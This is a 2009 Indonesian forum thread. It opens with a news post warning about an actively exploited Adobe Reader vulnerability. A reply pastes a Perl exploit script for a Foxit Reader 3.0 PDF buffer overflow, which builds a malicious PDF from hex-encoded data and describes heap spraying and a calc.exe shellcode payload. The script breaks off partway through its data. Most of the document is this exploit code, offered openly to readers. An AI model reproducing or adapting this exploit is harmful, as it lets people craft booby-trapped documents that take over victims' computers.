Results 1 to 6 of 6
http://idgs.in/184745
  1. 09-04-09, 06:08 #1
    -GajahLampung-
    -GajahLampung- is offline
    -GajahLampung-'s Avatar
    Join Date
    Nov 2008
    Location
    Penangkaran Gajah
    Posts
    1,069
    Points
    1,449.20
    Thanks: 0 / 4 / 4

    Default Hati-hati Membuka File PDF!



    Perusahaan keamanan mengingatkan ada dua program Adobe yang bisa dimanfaatkan oleh hacker untuk menguasai PC. Hacker secara aktif menyerang kelemahan itu, terutama pada Adobe Reader dan Acrobat versi 8 dan 9 yang digunakan untuk membuka file PDF.

    Menurut Adobe, permasalahan ini bisa menyebabkan aplikasi crash dan secara potensial mengijinkan penyerang untuk mengambil alih sistem yang menjadi korban. Adobe mengkategorikan masalah itu kritis dan merekomendasikan user mengupdate antivirus mereka dan menscan dulu sebelum membuka file dari sumber tidak terpercaya.

    "Adobe merencanakan akan mengeluarkan update untuk Adobe Reader dan Acrobat guna mengatasi permasalahaan ini. Adobe akan menyediakannya pada 11 Maret 2009 untuk versi 9," kata perusahaan itu. Untuk update versi 7 dan 8 keluar belakangan.

    Untuk waktu sekarang, Adobe telah menghubungi vendor antivirus termasuk McAfee dan Symantec. Menurut Shadowserver Foundation, ada beberapa variasi serangan dan hanya masalah waktu saja kekurangan itu akan bisa ditembus exploit pack di internet.
    "Permasalahan di Adobe Reader menyebabkan penyerang bisa menimpa memori di lokasi arbitrari," kata Geok Meng Ong dari McAfee . "Serangan itu menggunakan metode 'HeapSpray' melalui JavaScript untuk mendapat kontrol pada eksekusi program," jelasnya. (inilah)
    GL Buat Budi AnduK
    2. Hot Ad
  2. 09-04-09, 07:50 #2
    bl00d13z
    bl00d13z is offline
    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    yap betull.. ini sy kasi contoh script perl buat bikin buffer overflowny :

    Code:
    #!/usr/bin/perl
#
# Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit (Universal)
# ------------------------------------------------------------------------
# Exploit by SkD                                      ([email protected])
#
# A SEH overflow occurs in this vulnerability in the popular
# Foxit Reader. The latest build (1506) is not affected but
# previous are. SafeSEH is a ***** in this one, but nothing
# is impossible :).
#
# UPDATE: I have implemented Heap Spraying by JavaScript to
# make it universal :). The current shellcode is to execute
# calc.exe.
#
# Exploit written for Windows XP SP3 (should work on other
# versions).
#
# Credits to CORE Sec.
#
# Note: Author is not responsible for any damage done with this.

use strict;
use warnings;

my $pdf_data1 = "\x25\x50\x44\x46\x2D\x31\x2E\x34\x0D\x0A\x25\xA1\xB3\xC5\xD7\x0D\x0A\x31\x20\x30\x20\x6F".
	        "\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x50\x61\x67\x65\x2F\x50\x61\x72\x65\x6E".
	        "\x74\x20\x34\x20\x30\x20\x52\x20\x2F\x52\x65\x73\x6F\x75\x72\x63\x65\x73\x20\x36\x20\x30".
	        "\x20\x52\x20\x2F\x4D\x65\x64\x69\x61\x42\x6F\x78\x5B\x20\x30\x20\x30\x20\x35\x39\x35\x20".
	        "\x38\x34\x32\x5D\x2F\x47\x72\x6F\x75\x70\x3C\x3C\x2F\x53\x2F\x54\x72\x61\x6E\x73\x70\x61".
	        "\x72\x65\x6E\x63\x79\x2F\x43\x53\x2F\x44\x65\x76\x69\x63\x65\x52\x47\x42\x2F\x49\x20\x74".
	        "\x72\x75\x65\x3E\x3E\x2F\x43\x6F\x6E\x74\x65\x6E\x74\x73\x20\x32\x20\x30\x20\x52\x20\x2F".
	        "\x41\x6E\x6E\x6F\x74\x73\x5B\x20\x32\x34\x20\x30\x20\x52\x20\x20\x32\x35\x20\x30\x20\x52".
	        "\x20\x20\x39\x20\x30\x20\x52\x20\x5D\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32".
	        "\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4C\x65\x6E\x67\x74\x68\x20\x33\x20\x30\x20".
	        "\x52\x20\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46\x6C\x61\x74\x65\x44\x65\x63\x6F\x64\x65\x3E".
	        "\x3E\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\x9C\x33\xD0\x33\x54\x28\xE7\x2A\x54\x30\x50\x30".
	        "\x00\xB2\x4C\x2D\x4D\xF5\x8C\x15\x2C\x4C\x0C\xF5\x2C\x15\x8A\x52\x15\xC2\xB5\x14\xF2\xB8".
	        "\x02\x15\x00\x87\xEB\x07\x8A\x0D\x0A\x65\x6E\x64\x73\x74\x72\x65\x61\x6D\x0D\x0A\x65\x6E".
	        "\x64\x6F\x62\x6A\x0D\x0A\x33\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x20\x34\x32\x0D\x0A\x65\x6E".
	        "\x64\x6F\x62\x6A\x0D\x0A\x34\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65".
	        "\x2F\x50\x61\x67\x65\x73\x2F\x52\x65\x73\x6F\x75\x72\x63\x65\x73\x20\x36\x20\x30\x20\x52".
	        "\x20\x2F\x4D\x65\x64\x69\x61\x42\x6F\x78\x5B\x20\x30\x20\x30\x20\x35\x39\x35\x20\x38\x34".
	        "\x32\x5D\x2F\x4B\x69\x64\x73\x5B\x20\x31\x20\x30\x20\x52\x20\x5D\x2F\x43\x6F\x75\x6E\x74".
	        "\x20\x31\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x35\x20\x30\x20\x6F\x62\x6A\x0D".
	        "\x0A\x3C\x3C\x2F\x5A\x69\x54\x69\x20\x31\x38\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E".
	        "\x64\x6F\x62\x6A\x0D\x0A\x36\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x46\x6F\x6E\x74".
	        "\x20\x35\x20\x30\x20\x52\x20\x2F\x50\x72\x6F\x63\x53\x65\x74\x5B\x2F\x50\x44\x46\x2F\x54".
	        "\x65\x78\x74\x5D\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x37\x20\x30\x20\x6F\x62".
	        "\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x43\x61\x74\x61\x6C\x6F\x67\x2F\x50\x61\x67".
	        "\x65\x73\x20\x34\x20\x30\x20\x52\x20\x2F\x4F\x70\x65\x6E\x41\x63\x74\x69\x6F\x6E\x5B\x20".
	        "\x31\x20\x30\x20\x52\x20\x2F\x58\x59\x5A\x20\x6E\x75\x6C\x6C\x20\x6E\x75\x6C\x6C\x20\x30".
	        "\x5D\x2F\x4C\x61\x6E\x67\x28\x65\x6E\x2D\x55\x53\x29\x2F\x4E\x61\x6D\x65\x73\x20\x32\x38".
	        "\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x38\x20\x30\x20\x6F".
	        "\x62\x6A\x0D\x0A\x3C\x3C\x2F\x41\x75\x74\x68\x6F\x72\x28\xFE\xFF\x00\x6D\x00\x61\x00\x72".
	        "\x00\x63\x00\x69\x00\x61\x00\x6E\x00\x6F\x29\x2F\x43\x72\x65\x61\x74\x6F\x72\x28\xFE\xFF".
	        "\x00\x57\x00\x72\x00\x69\x00\x74\x00\x65\x00\x72\x29\x2F\x50\x72\x6F\x64\x75\x63\x65\x72".
	        "\x28\xFE\xFF\x00\x4F\x00\x70\x00\x65\x00\x6E\x00\x4F\x00\x66\x00\x66\x00\x69\x00\x63\x00".
	        "\x65\x00\x2E\x00\x6F\x00\x72\x00\x67\x00\x20\x00\x33\x00\x2E\x00\x30\x29\x2F\x43\x72\x65".
	        "\x61\x74\x69\x6F\x6E\x44\x61\x74\x65\x28\x44\x3A\x32\x30\x30\x39\x30\x32\x31\x39\x31\x34".
	        "\x34\x35\x34\x39\x2D\x30\x32\x27\x30\x30\x27\x29\x2F\x4D\x6F\x64\x44\x61\x74\x65\x28\x44".
	        "\x3A\x32\x30\x30\x39\x30\x33\x31\x32\x32\x32\x30\x32\x34\x33\x2D\x30\x38\x27\x30\x30\x27".
	        "\x29\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x39\x20\x30\x20\x6F\x62\x6A\x0D\x0A".
	        "\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x6E\x6E\x6F\x74\x2F\x53\x75\x62\x74\x79\x70\x65\x2F".
	        "\x53\x63\x72\x65\x65\x6E\x2F\x50\x20\x31\x20\x30\x20\x52\x20\x2F\x4D\x28\x44\x3A\x32\x30".
	        "\x30\x39\x30\x32\x31\x39\x31\x34\x34\x37\x35\x36\x2D\x30\x32\x27\x30\x30\x27\x29\x2F\x46".
	        "\x20\x34\x2F\x52\x65\x63\x74\x5B\x20\x32\x30\x35\x2E\x31\x35\x33\x20\x38\x30\x36\x2E\x31".
	        "\x38\x32\x20\x33\x33\x35\x2E\x32\x39\x31\x20\x38\x33\x33\x2E\x34\x37\x32\x5D\x2F\x42\x53".
	        "\x3C\x3C\x2F\x53\x2F\x53\x2F\x57\x20\x31\x3E\x3E\x2F\x42\x45\x3C\x3C\x2F\x53\x2F\x53\x3E".
	        "\x3E\x2F\x4D\x4B\x3C\x3C\x2F\x42\x43\x5B\x20\x30\x20\x30\x20\x31\x5D\x2F\x52\x20\x30\x2F".
	        "\x49\x46\x3C\x3C\x2F\x53\x57\x2F\x41\x2F\x53\x2F\x41\x2F\x46\x42\x20\x66\x61\x6C\x73\x65".
	        "\x2F\x41\x5B\x20\x30\x2E\x35\x20\x30\x2E\x35\x5D\x3E\x3E\x3E\x3E\x2F\x41\x50\x3C\x3C\x2F".
	        "\x4E\x20\x31\x30\x20\x30\x20\x52\x20\x3E\x3E\x2F\x54\x28\x63\x75\x61\x6C\x71\x75\x69\x65".
	        "\x72\x61\x29\x2F\x41\x20\x31\x32\x20\x30\x20\x52\x20\x2F\x41\x41\x20\x31\x37\x20\x30\x20".
	        "\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x30\x20\x30\x20\x6F\x62\x6A".
	        "\x0D\x0A\x3C\x3C\x2F\x4D\x61\x74\x72\x69\x78\x5B\x20\x31\x20\x30\x20\x30\x20\x31\x20\x30".
	        "\x20\x30\x5D\x2F\x42\x42\x6F\x78\x5B\x20\x30\x20\x30\x20\x31\x33\x30\x2E\x31\x33\x39\x20".
	        "\x32\x37\x2E\x32\x38\x39\x37\x5D\x2F\x52\x65\x73\x6F\x75\x72\x63\x65\x73\x3C\x3C\x2F\x45".
	        "\x78\x74\x47\x53\x74\x61\x74\x65\x3C\x3C\x2F\x49\x6D\x61\x67\x65\x4F\x70\x61\x63\x69\x74".
	        "\x79\x20\x31\x31\x20\x30\x20\x52\x20\x3E\x3E\x3E\x3E\x2F\x4C\x65\x6E\x67\x74\x68\x20\x35".
	        "\x34\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46\x6C\x61\x74\x65\x44\x65\x63\x6F\x64\x65\x3E\x3E".
	        "\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\x9C\x2B\xE4\x2A\xE4\x32\x50\x00\xC1\xA2\x74\x30\xC3".
	        "\xD0\xD8\x40\xCF\xD0\xD8\x52\xC1\xC8\x5C\xCF\xC8\xC2\xD2\x5C\xA1\x28\x95\xCB\x50\x01\x08".
	        "\x8D\x2C\x20\xC2\xA6\x70\xE1\x34\x2D\xAE\x40\x20\x04\x00\xBD\x52\x0D\x43\x0D\x0A\x65\x6E".
	        "\x64\x73\x74\x72\x65\x61\x6D\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x31\x20\x30\x20".
	        "\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x45\x78\x74\x47\x53\x74\x61\x74\x65".
	        "\x2F\x43\x41\x20\x31\x2F\x63\x61\x20\x31\x2F\x41\x49\x53\x20\x66\x61\x6C\x73\x65\x3E\x3E".
	        "\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x32\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C".
	        "\x2F\x54\x79\x70\x65\x2F\x41\x63\x74\x69\x6F\x6E\x2F\x53\x2F\x52\x65\x6E\x64\x69\x74\x69".
	        "\x6F\x6E\x2F\x4F\x50\x20\x34\x2F\x41\x4E\x20\x39\x20\x30\x20\x52\x20\x2F\x52\x20\x31\x33".
	        "\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x33\x20\x30\x20".
	        "\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x53\x2F\x4D\x52\x2F\x43\x20\x31\x34\x20\x30\x20\x52\x20".
	        "\x2F\x4E\x28\x63\x75\x61\x6C\x71\x75\x69\x65\x72\x61\x29\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F".
	        "\x62\x6A\x0D\x0A\x31\x34\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x53\x2F\x4D\x43\x44".
	        "\x2F\x43\x54\x28\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x66\x75\x74\x75\x72\x65".
	        "\x73\x70\x6C\x61\x73\x68\x29\x2F\x50\x3C\x3C\x2F\x54\x46\x28\x54\x45\x4D\x50\x41\x43\x43".
	        "\x45\x53\x53\x29\x3E\x3E\x2F\x44\x20\x31\x35\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E".
	        "\x64\x6F\x62\x6A\x0D\x0A\x31\x35\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70".
	        "\x65\x2F\x46\x69\x6C\x65\x73\x70\x65\x63\x2F\x46\x28\x63\x75\x61\x6C\x71\x75\x69\x65\x72".
	        "\x61\x29\x2F\x46\x53\x2F\x55\x52\x4C\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31".
	        "\x36\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x63\x74\x69\x6F".
	        "\x6E\x2F\x53\x2F\x4C\x61\x75\x6E\x63\x68\x2F\x46\x3C\x3C\x2F\x46\x28\x2F\x43\x2F";
my $pdf_data2 = "\x29\x3E\x3E\x2F\x4E\x65\x77\x57\x69\x6E\x64\x6F\x77\x20\x74\x72\x75\x65\x3E\x3E\x0D\x0A".
	        "\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x37\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x50".
	        "\x56\x20\x31\x36\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31".
	        "\x38\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x46\x6F\x6E\x74\x2F".
	        "\x53\x75\x62\x74\x79\x70\x65\x2F\x54\x79\x70\x65\x31\x2F\x42\x61\x73\x65\x46\x6F\x6E\x74".
	        "\x2F\x48\x65\x6C\x76\x65\x74\x69\x63\x61\x2F\x45\x6E\x63\x6F\x64\x69\x6E\x67\x2F\x57\x69".
	        "\x6E\x41\x6E\x73\x69\x45\x6E\x63\x6F\x64\x69\x6E\x67\x2F\x46\x78\x54\x61\x67\x20\x31\x3E".
	        "\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x39\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C".
	        "\x3C\x2F\x4E\x20\x32\x30\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D".
	        "\x0A\x32\x30\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4C\x65\x6E\x67\x74\x68\x20\x31".
	        "\x36\x38\x2F\x53\x75\x62\x74\x79\x70\x65\x2F\x46\x6F\x72\x6D\x2F\x42\x42\x6F\x78\x5B\x20".
	        "\x32\x38\x35\x20\x37\x39\x34\x20\x35\x34\x31\x20\x38\x32\x37\x5D\x2F\x52\x65\x73\x6F\x75".
	        "\x72\x63\x65\x73\x20\x32\x31\x20\x30\x20\x52\x20\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46\x6C".
	        "\x61\x74\x65\x44\x65\x63\x6F\x64\x65\x3E\x3E\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\x9C\x95".
	        "\x8D\xCD\x0E\x82\x30\x10\x84\xEF\x7D\x8A\x3D\x42\xA2\xD8\x16\x88\x78\x15\xE1\x66\x4C\xB4".
	        "\x2F\x50\x43\xC1\x1A\xE8\x92\xA6\xFE\xF4\xED\x25\x24\x28\x89\x27\xF6\x30\x99\x99\x6C\xBE".
	        "\xD9\x0B\xB2\x39\xFA\x12\x8D\x03\xC6\x40\xD4\x84\x45\x74\x3C\xA0\x7F\xC6\x36\x84\xC1\x90".
	        "\x81\x01\xCF\xD2\xA9\xDD\xEE\x92\xC9\x8A\x8E\x7C\x9F\x79\x12\xC5\x9C\x51\x3A\x40\x0F\x24".
	        "\x28\x2A\xED\x54\x05\x57\x0F\x25\xBE\xB5\x83\xB3\x92\x95\xB2\x21\x88\xFB\x02\x24\x8B\xE7".
	        "\xC8\x1C\x7B\x6F\x75\x73\x73\x41\x1E\xFE\xC0\x17\xAC\xDD\x4B\x5A\x05\x39\x76\xBD\x34\x7E".
	        "\xC5\x29\x4D\xD7\x83\x64\x0B\xC7\xF8\x7C\xAB\x44\x0B\xC5\x53\xB6\x0F\xE9\x34\x1A\x38\x99".
	        "\xD6\x47\x23\xAF\x10\xE4\x03\x4A\x14\x4C\x32\x0D\x0A\x65\x6E\x64\x73\x74\x72\x65\x61\x6D".
	        "\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x31\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C".
	        "\x2F\x46\x6F\x6E\x74\x20\x32\x32\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62".
	        "\x6A\x0D\x0A\x32\x32\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4D\x79\x46\x6F\x6E\x74".
	        "\x20\x31\x38\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x33".
	        "\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x65\x78\x74\x4D\x61\x74\x72\x69\x78\x5B".
	        "\x20\x31\x20\x30\x20\x30\x20\x31\x20\x32\x38\x35\x20\x38\x31\x30\x2E\x35\x5D\x2F\x4C\x69".
	        "\x63\x65\x6E\x73\x65\x28\x45\x76\x61\x6C\x75\x61\x74\x69\x6F\x6E\x29\x2F\x4D\x65\x6E\x64".
	        "\x65\x72\x46\x6C\x61\x67\x28\x45\x76\x61\x6C\x75\x61\x74\x69\x6F\x6E\x2C\x41\x4E\x4E\x4F".
	        "\x54\x29\x2F\x46\x6F\x6E\x74\x4E\x61\x6D\x65\x28\x48\x65\x6C\x76\x65\x74\x69\x63\x61\x29".
	        "\x2F\x46\x6F\x6E\x74\x53\x69\x7A\x65\x20\x31\x31\x2F\x54\x65\x78\x74\x28\x45\x64\x69\x74".
	        "\x65\x64\x20\x62\x79\x20\x46\x6F\x78\x69\x74\x20\x52\x65\x61\x64\x65\x72\x5C\x72\x43\x6F".
	        "\x70\x79\x72\x69\x67\x68\x74\x5C\x28\x43\x5C\x29\x20\x62\x79\x20\x46\x6F\x78\x69\x74\x20".
	        "\x53\x6F\x66\x74\x77\x61\x72\x65\x20\x43\x6F\x6D\x70\x61\x6E\x79\x2C\x32\x30\x30\x35\x2D".
	        "\x32\x30\x30\x38\x5C\x72\x46\x6F\x72\x20\x45\x76\x61\x6C\x75\x61\x74\x69\x6F\x6E\x20\x4F".
	        "\x6E\x6C\x79\x2E\x5C\x72\x29\x2F\x43\x68\x61\x72\x43\x6F\x6C\x6F\x72\x20\x32\x35\x35\x2F".
	        "\x43\x68\x61\x72\x53\x70\x61\x63\x65\x20\x30\x2F\x4C\x69\x6E\x65\x46\x65\x65\x64\x20\x30".
	        "\x2F\x48\x6F\x72\x7A\x53\x63\x61\x6C\x65\x20\x31\x30\x30\x2F\x4F\x72\x69\x67\x69\x6E\x58".
	        "\x20\x32\x38\x35\x2F\x4F\x72\x69\x67\x69\x6E\x59\x20\x38\x31\x36\x2F\x62\x43\x68\x61\x6E".
	        "\x67\x65\x42\x6F\x78\x20\x30\x2F\x42\x6F\x78\x57\x69\x64\x74\x68\x20\x32\x35\x36\x3E\x3E".
	        "\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x34\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C".
	        "\x2F\x53\x75\x62\x74\x79\x70\x65\x2F\x46\x72\x65\x65\x54\x65\x78\x74\x2F\x52\x65\x63\x74".
	        "\x5B\x20\x32\x38\x35\x20\x37\x39\x34\x20\x35\x34\x31\x20\x38\x32\x37\x5D\x2F\x46\x20\x34".
	        "\x2F\x41\x50\x20\x31\x39\x20\x30\x20\x52\x20\x2F\x46\x6F\x78\x69\x74\x54\x61\x67\x20\x32".
	        "\x33\x20\x30\x20\x52\x20\x2F\x50\x20\x31\x20\x30\x20\x52\x20\x2F\x50\x6F\x70\x75\x70\x20".
	        "\x32\x35\x20\x30\x20\x52\x20\x2F\x46\x4E\x28\x48\x65\x6C\x76\x65\x74\x69\x63\x61\x29\x2F".
	        "\x43\x6F\x6E\x74\x65\x6E\x74\x73\x28\x45\x64\x69\x74\x65\x64\x20\x62\x79\x20\x46\x6F\x78".
	        "\x69\x74\x20\x52\x65\x61\x64\x65\x72\x5C\x72\x43\x6F\x70\x79\x72\x69\x67\x68\x74\x5C\x28".
	        "\x43\x5C\x29\x20\x62\x79\x20\x46\x6F\x78\x69\x74\x20\x53\x6F\x66\x74\x77\x61\x72\x65\x20".
	        "\x43\x6F\x6D\x70\x61\x6E\x79\x2C\x32\x30\x30\x35\x2D\x32\x30\x30\x38\x5C\x72\x46\x6F\x72".
	        "\x20\x45\x76\x61\x6C\x75\x61\x74\x69\x6F\x6E\x20\x4F\x6E\x6C\x79\x2E\x5C\x72\x29\x2F\x42".
	        "\x4B\x43\x20\x36\x35\x35\x33\x35\x2F\x51\x20\x30\x2F\x44\x41\x28\x2F\x5A\x69\x54\x69\x20".
	        "\x31\x31\x20\x54\x66\x20\x31\x20\x30\x20\x30\x20\x72\x67\x20\x31\x20\x30\x20\x30\x20\x31".
	        "\x20\x32\x38\x35\x20\x38\x31\x30\x2E\x35\x20\x54\x6D\x20\x30\x20\x54\x63\x20\x31\x30\x30".
	        "\x20\x54\x7A\x29\x2F\x49\x54\x2F\x46\x72\x65\x65\x54\x65\x78\x74\x54\x79\x70\x65\x77\x72".
	        "\x69\x74\x65\x72\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x35\x20\x30\x20\x6F".
	        "\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x6E\x6E\x6F\x74\x2F\x53\x75\x62\x74".
	        "\x79\x70\x65\x2F\x50\x6F\x70\x75\x70\x2F\x50\x20\x31\x20\x30\x20\x52\x20\x2F\x4D\x28\x44".
	        "\x3A\x32\x30\x30\x39\x30\x32\x31\x39\x31\x34\x34\x38\x31\x35\x2D\x30\x32\x27\x30\x30\x27".
	        "\x29\x2F\x46\x20\x32\x38\x2F\x52\x65\x63\x74\x5B\x20\x30\x20\x30\x20\x30\x20\x30\x5D\x2F".
	        "\x4F\x70\x65\x6E\x20\x66\x61\x6C\x73\x65\x2F\x50\x61\x72\x65\x6E\x74\x20\x32\x34\x20\x30".
	        "\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x33\x30\x20\x30\x20\x6F\x62".
	        "\x6A\x0D\x0A\x5B\x28\x53\x6B\x44\x53\x63\x72\x69\x70\x74\x29\x20\x32\x36\x20\x30\x20\x52".
	        "\x5D\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x39\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C".
	        "\x3C\x2F\x4E\x61\x6D\x65\x73\x20\x33\x30\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64".
	        "\x6F\x62\x6A\x0D\x0A\x32\x38\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4A\x61\x76\x61".
	        "\x53\x63\x72\x69\x70\x74\x20\x32\x39\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F".
	        "\x62\x6A\x0D\x0A\x32\x37\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4C\x65\x6E\x67\x74".
	        "\x68\x20\x37\x39\x36\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46\x6C\x61\x74\x65\x44\x65\x63\x6F".
	        "\x64\x65\x3E\x3E\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\x9C\x7D\x54\x5D\x8F\xDA\x30\x10\x7C".
	        "\x47\xE2\x3F\x44\x48\x48\x20\x7A\x95\x13\xAF\x77\x13\x71\x54\xAA\xFA\x33\xAA\x3E\x24\xC1".
	        "\xB9\x8B\xCA\x01\x82\xE3\xAE\xED\xAF\xEF\xEE\xA4\x31\x5C\xBF\x78\xB0\x8C\xBD\xB3\x3B\x3B".
	        "\x3B\xCE\x4B\x7D\xCA\x8E\xF5\xF7\xDD\xA1\xDE\x66\x9B\xEC\xB2\x8F\xE7\xB6\x3E\xC6\xC5\x6C".
	        "\x7E\x71\x3E\x36\xF3\x4B\x6C\x42\xA5\x6B\xE9\xC2\xFC\xD2\x75\x5D\x89\xB5\x9B\x5F\xA8\xA2".
	        "\xEA\x76\x9D\x65\xAB\xE9\x64\x86\x7D\xF9\xE7\xED\xDB\x35\xD4\x21\xD7\xBD\xE7\x7A\x44\x79".
	        "\x17\x14\xE5\x73\x2A\xF4\xBC\x08\x6E\x7E\xE1\x86\x2C\x66\x3C\xF1\xB6\x7A\xDD\xFB\x82\xF2".
	        "\x54\x2B\x1F\x62\xBC\xC6\x87\xD2\xF6\xBE\x34\x2C\x15\x40\x95\x12\x2C\x0F\x5B\xDD\x2D\xB5".
	        "\x23\x8A\xBD\xD7\x5A\x12\x84\x34\xDE\xA3\x96\x58\x06\x6A\x45\x57\xF1\xA4\x5D\x07\x01\x36".
	        "\xDE\xA2\x58\xCF\x29\x50\x6B\xFB\x10\x0C\x6B\x9D\x86\xD2\x6B\x5D\x6E\x59\x35\x11\x67\x58".
	        "\x11\xEA\x12\x2A\xB2\xD5\x02\x56\x72\x8B\xE1\x60\xB5\x18\x0A\x48\x61\xF1\x14\x8D\xA1\x67".
	        "\x6E\x52\x5F\x31\x90\xD5\x42\xC5\x41\x2B\xA6\x68\xBD\x60\xDF\x09\xD8\x1A\x4A\xF3\x27\x86".
	        "\xA1\x62\xB2\x5A\xD6\x51\xF0\x44\xE0\x26\x7A\x52\x9B\x32\x81\xB8\x06\xE7\xAD\x9E\x28\xE7".
	        "\x54\xAB\x34\xAD\xA4\x06\x43\xB1\xBA\x01\xAC\x98\xA1\x0F\x59\x1E\x2E\x90\xAD\x0A\xE1\xDA".
	        "\x97\xE9\x43\xB9\xA1\x3C\x53\x07\x65\x68\xEC\x2B\x40\x43\x6A\x03\x83\x79\xEA\x4B\x0A\x6E".
	        "\xC1\xBC\x19\x63\xBC\x40\x13\x6F\xE7\x5C\x9B\x92\x14\xA1\x61\xB8\xAA\xC1\xAD\x69\xAE\xE9".
	        "\x1B\xB0\xB5\x98\x2D\x32\xE4\xE6\xCC\x90\xDB\xAD\x27\x6F\x8A\xD5\x44\x57\x47\xB1\x7A\x86".
	        "\x3B\x4C\xA7\xC0\x7C\xA3\x31\x14\x70\x0E\x04\x9F\x34\x02\xA7\xF9\xD4\x57\x70\xD0\x96\xA5".
	        "\xC4\x4C\x31\x6B\xD4\xA5\x41\x73\xAB\x45\x60\xE2\x75\x8E\x57\x35\xE0\x8A\xD6\xB4\xE5\x1C".
	        "\xFE\x09\xC8\x50\x9B\xAB\x79\x60\x1E\xCD\xF9\xEA\xC6\x9B\xBE\xE0\x5B\x91\xB4\xD2\xB0\x0E".
	        "\x3E\x84\x97\x48\xE0\x9F\xFC\xEA\x43\xAD\x6E\x8A\x35\x92\x63\x9A\x6C\x93\x42\x2F\x9D\x67".
	        "\x60\xE1\x0A\x73\x38\x75\xEC\x93\xF2\x78\x23\xAA\x89\xE5\xCC\xE1\x90\x72\xE8\x51\x06\xB7".
	        "\xD4\xA6\xA4\xC7\x8B\xB8\xBA\x57\x7D\x68\xAF\xB2\x42\xE4\x96\xA3\x29\x13\x6A\xEB\x11\xFB".
	        "\x86\xD4\x5D\x5C\x81\x8F\x17\x49\xA8\x60\xAF\xD5\x7B\xF3\xDB\x30\x71\x7D\xDD\x62\xDA\xC2".
	        "\xB1\x85\x61\xB5\x3B\x78\x95\xBB\x9B\xB7\x2C\x70\x94\xB7\x48\xE8\x5C\x88\xE5\x19\xA6\x3C".
